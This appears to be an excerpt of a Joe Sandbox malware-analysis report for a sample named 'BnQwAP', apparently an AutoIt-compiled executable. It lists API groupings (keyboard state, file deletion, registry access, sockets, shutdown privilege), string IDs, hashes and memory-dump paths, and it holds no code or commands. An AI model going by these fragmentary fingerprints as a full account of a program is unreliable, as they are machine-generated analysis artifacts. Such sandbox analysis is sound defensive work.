                                                                                                                    • Opcode ID: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                    • Instruction ID: 7de6de790977cde68c26a4f2871a3dd4d17e4c123fe8fd60d8434837aa8f4487
                                                                                                                    • Opcode Fuzzy Hash: 6e164f36fc51d55b22e1026945b1aa4b641673a9c64d89865777c7d9524d423d
                                                                                                                    • Instruction Fuzzy Hash: A7216426B1859391E720DB25F9646AA6321FFE4B4CFC88031D64DA39A8DE3DD90EC744
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 541375521-0
                                                                                                                    • Opcode ID: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                    • Instruction ID: 2c1050ba873778d53cf4fd476e0de52fcec94f90f91f4ae566f750a79464a592
                                                                                                                    • Opcode Fuzzy Hash: 3846c89bd659206fb3b2d3285dc51d557998776e104b8ac6e0153ffc668b7184
                                                                                                                    • Instruction Fuzzy Hash: 6B71F662A0C3C285FB758B30D1402B92B61EB66B88F5C0039DA8DA3392CE5FD94DD711
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 2640511053-438819550
                                                                                                                    • Opcode ID: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                    • Instruction ID: 66f8a66c0b8b23dc644c08a01f4346276c7d8e513f1a92e0406430822b1315fa
                                                                                                                    • Opcode Fuzzy Hash: d607f8cd377dc7cb12783564cfab50aac2a1e28959c9b0777418728c286e0dff
                                                                                                                    • Instruction Fuzzy Hash: 6241E421A0CA4350EA40EB16EB446B96391FF40BE8F985131ED6EA36D4EF3ED44EC700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Similarity
                                                                                                                    • API ID: QueryValue$Close$BuffCharConnectOpenRegistryUpper
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3218304859-0
                                                                                                                    • Opcode ID: bfd33b311cee2062ccf4f7c99d60df25cce3d62e1d08c3ae9d56584007b3da53
                                                                                                                    • Instruction ID: 159b727f564ebaba1e9a4a531020fd83ff3d6fe004f941f6eb706b3464e7727a
                                                                                                                    • Opcode Fuzzy Hash: bfd33b311cee2062ccf4f7c99d60df25cce3d62e1d08c3ae9d56584007b3da53
                                                                                                                    • Instruction Fuzzy Hash: 74F1C036B05B4286EB10DF65D1942AD33B0FF88B98B088132DE4EA7BA5DF39E455C744
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2762341140-0
                                                                                                                    • Opcode ID: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                                                                    • Instruction ID: 27dea0a9b66a22ef1f4d4be48c9967b2c36b7be8088125028c2278a3ff072405
                                                                                                                    • Opcode Fuzzy Hash: 28da4375d56d9c7790266f2ac16f9c30a3cff06f711ae95f6c1a6b970e5d2d74
                                                                                                                    • Instruction Fuzzy Hash: F9C16B76B04B8685EB50DF26D8841AD77A0FB88F98F094036DE4EA7765CF39D489C700
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1255039815-0
                                                                                                                    • Opcode ID: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                                                    • Instruction ID: 17bf0b1c1cad558b7815dc264a86a449818353496c490c0c41ca0ea7db8800ee
                                                                                                                    • Opcode Fuzzy Hash: ea7a7ac653921025fbba948ebd31ca7d5268814b13a9ba19b0931f3d2795027d
                                                                                                                    • Instruction Fuzzy Hash: E861BF22B047518AEB20CFA2D9445AC37B5FF94B9DB084035DE8EA3B95DF7AD949C340
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$LongWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 312131281-0
                                                                                                                    • Opcode ID: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                                                    • Instruction ID: 8b9951c0565889b98d101f085657e9743cff9adc9886aaf9bcab891c5ca253ce
                                                                                                                    • Opcode Fuzzy Hash: abdc22e6bb891721ce5e067b69be811f88521fd2379c3c8bf9918a79da049ba4
                                                                                                                    • Instruction Fuzzy Hash: 7371C236605A91C5E720CF65D9446EE3760FB88B98F584132DE4D97BA4CF3DD58AC700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 4047182710-1173974218
                                                                                                                    • Opcode ID: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                                    • Instruction ID: d890c52efde343c88c9e61988da6da286b269392df8f64a8c3e771b7ce80c1a2
                                                                                                                    • Opcode Fuzzy Hash: 3e5e0e112cc80aa2c2516f057e4a01b659553512389772208b3739e74699da54
                                                                                                                    • Instruction Fuzzy Hash: E581A922A0864395FB50EB61E5541FD6B60FF91798F480032FA4EA79A9DF3DE94DCB00
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1957940570-0
                                                                                                                    • Opcode ID: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                                    • Instruction ID: 8b0f1644aaa6bdae04bef193d445d0cb96f04d59be0bcf832cf65b150e411129
                                                                                                                    • Opcode Fuzzy Hash: 67bda6fc94471c3762a54e3e67296020613b076a2f011637c0efff71f078e81c
                                                                                                                    • Instruction Fuzzy Hash: 0F213972919B8182E710CF53E54836AB7A1F789FDAF484129DA8D53B64CF7DD158CB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
                                                                                                                    • String ID: ?
                                                                                                                    • API String ID: 500310315-1684325040
                                                                                                                    • Opcode ID: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                                                    • Instruction ID: 4bfdb4f78361f0c9eb6c2a59f7a355d53a77240493d6ab5e7d50e55792bc93fb
                                                                                                                    • Opcode Fuzzy Hash: 94c2f1c66049ff4599948a3e12081019eb49e95131d575ab39d1df6a0a8379ea
                                                                                                                    • Instruction Fuzzy Hash: 8B619332A1864286F760DF21EE801A977A4FF84794F980135EA0EE3B94DF3DE449C750
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 540024437-0
                                                                                                                    • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                                    • Instruction ID: 7615595d39e83beb59bd412fe7a7d552cba5c5292651960ff1f0cedca4a79b66
                                                                                                                    • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                                                                    • Instruction Fuzzy Hash: 2641CE62B0868282EB14DF26D5852796760FF84FA8F084630DA9E97792CF3DE449CB00
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 0-572801152
                                                                                                                    • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                                                    • Instruction ID: dddc6c00fbcb517905f2a1f4fafa3e31c2d97dd1d1694c488af38e4e456fc523
                                                                                                                    • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                                                                    • Instruction Fuzzy Hash: F7E1C136A08B8286EB50CF65E5402AD77A4FB84B98F484136DF4DA7B94DF3DE549C700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1239891234-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1413079979-0
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1653399731-2785691316
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 1927845040-438819550
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                                                                    • API String ID: 0-2187161917
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: !$VUUU$fmod
                                                                                                                    • API String ID: 1757819995-2579133210
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1286766494-0
                                                                                                                    Similarity
                                                                                                                    • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                    • API String ID: 2163645468-3733053543
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF656005C43
                                                                                                                    Similarity
                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2733932498-0
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1083639309-0
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: DEFINE$x
                                                                                                                    • API String ID: 0-4035502692
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1502251526-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3541575487-0
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1682464887-0
                                                                                                                    • Opcode ID: e4554bc00dae79acf66b4cb450403028b462a58aae1405cf9917eeaf9ae9a37c
                                                                                                                    • Instruction ID: adb9dd0524f805be66a92c8c7374af2e491adfb6df8532c870eb92cc02f8e4d3
                                                                                                                    • Opcode Fuzzy Hash: e4554bc00dae79acf66b4cb450403028b462a58aae1405cf9917eeaf9ae9a37c
                                                                                                                    • Instruction Fuzzy Hash: 6C31A436A08B8686E7119F25E48426E7760FF84F98F148131EB8E93B61DF7DD446CB00
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2278415577-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 33631002-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    APIs
                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF65601475C,?,?,00000000,00007FF6560147D9,?,?,?,?,?,00007FF656062210), ref: 00007FF65601BF3F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem
                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime
                                                                                                                    • API String ID: 2086374402-595813830
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 15204871-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: a/p$am/pm
                                                                                                                    • API String ID: 0-3206640213
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0$0x%p
                                                                                                                    • API String ID: 3215553584-2479247192
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: no error
                                                                                                                    • API String ID: 0-1106124726
                                                                                                                    Similarity
                                                                                                                    • API ID: FileInternetRead_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 101623796-0
                                                                                                                    Similarity
                                                                                                                    • API ID: InputSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3431551938-0
                                                                                                                    Similarity
                                                                                                                    • API ID: mouse_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2434400541-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 0-2766056989
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 118556049-0
                                                                                                                    • Opcode ID: 15c9b4ff0d6c777accddb7297f0b6f18c58627f5bf608979e553ed2db80b772c
                                                                                                                    • Instruction ID: e2344514f0d1ac9d38b875fca642addc23e6fa5ee5e2031af188b1441a69d248
                                                                                                                    • Opcode Fuzzy Hash: 15c9b4ff0d6c777accddb7297f0b6f18c58627f5bf608979e553ed2db80b772c
                                                                                                                    • Instruction Fuzzy Hash: 4A52D076B0964289EB50DF65D5482BC33A2FB44BA8F484231DE1DB77D9DE39E809C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$LongWindow$ModeObjectStockText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 554392163-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: wcscat$FileInfoQueryValueVersion$Sizewcscpywcsstr
                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                    • API String ID: 222038402-1459072770
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                    • API String ID: 2091158083-3440237614
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 1600147383-4113822522
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000010.00000002.1753585817.00007FF655FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF655FE0000, based on PE: true
                                                                                                                    • Associated: 00000010.00000002.1753559960.00007FF655FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF656095000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753661809.00007FF6560B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753717130.00007FF6560CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 00000010.00000002.1753740589.00007FF6560D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_16_2_7ff655fe0000_BnQwAP.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Load$Image$IconLibraryMessageSend_invalid_parameter_noinfo$DestroyExtractFree
                                                                                                                    • String ID: .dll$.exe$.icl
                                                                                                                    • API String ID: 258715311-1154884017
                                                                                                                    • Opcode ID: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                                                    • Instruction ID: 67b63547005cd4555eef9e08134258ff8a42ab17a8603691ae3250b00ff03df8
                                                                                                                    • Opcode Fuzzy Hash: e03b8a297f3e31543187ea4d980dcab107f3fc290ba37e0d0746b7471e731d00
                                                                                                                    • Instruction Fuzzy Hash: A971C632A04B5282EB648F22D544A7A23A5FF44F9CF484636ED1E977A4DF3ED449C300
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                                    • Instruction ID: caf52a328ca7dfad25c6793f84c5269330c2c7111b5b2c4fb023c84029184816
                                                                                                                    • Opcode Fuzzy Hash: 7c311c18288b1496fa214aa0c4abe44590be5c31b38ad7f7d9d564ed982c3a32
                                                                                                                    • Instruction Fuzzy Hash: 2D519936B15B01C6EB14CF62E914A6E33A2FB88B98B584135EE1E93B14DF3ED409C700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                    • API String ID: 2610073882-3931177956
                                                                                                                    • Opcode ID: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                                                                    • Instruction ID: 7914d7b36056632ec3e63051b01525eee3a3f27de35a706d0d018fb9d7c81792
                                                                                                                    • Opcode Fuzzy Hash: 8b012b72d9182424534d163227db5c9d184644b7672044e55a9e6dfc6ab7007a
                                                                                                                    • Instruction Fuzzy Hash: F2028D32A0865285FE699F69C39417D63A1FF05B84F4D4635CA0FA7A94DF3EE998C300
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 130057722-3010740371
                                                                                                                    • Opcode ID: 587d8ff44f56b4c982e82ef7faa21eb4bcf6eabd1a57bd80e25ab706fdae8aa1
                                                                                                                    • Instruction ID: 1bb861aa7348755c1f9ba66023983f4ccdbe7f7d2fe2a63ce57129e04bcee79c
                                                                                                                    • Opcode Fuzzy Hash: 587d8ff44f56b4c982e82ef7faa21eb4bcf6eabd1a57bd80e25ab706fdae8aa1
                                                                                                                    • Instruction Fuzzy Hash: 87C1B236618AC686EB30DF25E9406ED6360FB85B8CF444036EA8DA7B59DF7DD249C700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                                                    • String ID: tooltips_class32
                                                                                                                    • API String ID: 2443926738-1918224756
                                                                                                                    • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                    • Instruction ID: d94cbddf7069b9d8f1fee99ff81dac6662b93b1161f583b2dc88fe3e38db7741
                                                                                                                    • Opcode Fuzzy Hash: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
                                                                                                                    • Instruction Fuzzy Hash: 43918936A18B8586EB50CF65E5547AD33B1EB88B88F584036DE4EA7B68DF3DD049C700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2598888154-3916222277
                                                                                                                    • Opcode ID: 3994b7b28fef36ee27ebe09cd9ee49426cf7ca29f8cb3ed20e9a9f0582733bf5
                                                                                                                    • Instruction ID: 3740e2d694656b232e4bd5daa1848731849e61f71119853f751928234ebc365f
                                                                                                                    • Opcode Fuzzy Hash: 3994b7b28fef36ee27ebe09cd9ee49426cf7ca29f8cb3ed20e9a9f0582733bf5
                                                                                                                    • Instruction Fuzzy Hash: 77516776B15681CFE750CF66E540AAE77B1F748B88F048525EE4AA3B18CF39E419CB40
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 2706829360-2785691316
                                                                                                                    • Opcode ID: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                    • Instruction ID: dc64c3655739e6f56926ce15c3b551835414feb12e327fc793e5d1bd77e89a9c
                                                                                                                    • Opcode Fuzzy Hash: f387a50e6818b73d110b12cd73088d785cdd73093c11eac48bc39c6d5f3c3ae3
                                                                                                                    • Instruction Fuzzy Hash: 1E519232B25A1289EB10EF65DA846BD3371FB94B89F484031DE0EA3665CF7AD44DC300
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000000,?,?,?,00007FF65607FD7B), ref: 00007FF656081143
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 3964851224-909552448
